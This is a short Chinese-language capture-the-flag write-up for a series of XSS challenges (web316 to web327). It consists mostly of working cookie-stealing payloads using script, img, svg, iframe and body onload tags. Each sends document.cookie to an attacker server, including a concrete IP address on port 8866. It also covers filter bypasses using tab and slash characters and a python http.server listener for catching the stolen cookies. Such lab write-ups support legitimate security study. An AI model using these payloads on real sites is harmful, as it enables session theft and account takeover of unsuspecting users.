web316
输入 <script>alert(1)</script> 成功弹窗 直接 盗cookie
利用img标签<script>
var img=document.createElement("img"); img.src="http://ip:port/"+document.cookie;
</script>
利用windows.open<script>window.open('http://ip:port/'+document.cookie)</script>
``<script>window.location.href='http://ip:port/'+document.cookie</script><script>location.href='http://ip:port/'+document.cookie</script><input onfocus="window.open('http://ip:port/'+document.cookie)" autofocus><svg onload="window.open('http://ip:port/'+document.cookie)"><iframe onload="window.open('http://ip:port/'+document.cookie)"></iframe><body onload="window.open('http://ip:port/'+document.cookie)">
python3 -m http.server 8866
开启一个服务 接收弹回来的cookie
web317
过滤了<script>标签
利用<svg onload="window.open('http://ip:port/'+document.cookie)">
成功弹窗
web318
web319
继续利用<svg onload="window.open('http://139.196.6.154:8866/'+document.cookie)">
web320-321
过滤了 svg 空格 利用 iframe %09(TAB) 进行绕过<iframe%09onload=alert(document.cookie)></iframe>
成功弹窗
<iframe onload="window.open('http://139.196.6.154:8866/'+document.cookie)"></iframe>
web322-326
iframe 过滤了 用svg<svg onload="window.open('http://139.196.6.154:8866/'+document.cookie)">
过滤了空格 可以用 / 绕过<body/onload="window.open('http://139.196.6.154:8866/'+document.cookie)">
web327
登录https://xss.pt/xss.php
随便找一个 发送
poster必须为admin才能发送成功
不知道为什么一直弹不回来
用前面的方法<svg onload="window.open('http://139.196.6.154:8866/'+document.cookie)">
若有收获,就点个赞吧
0 人点赞
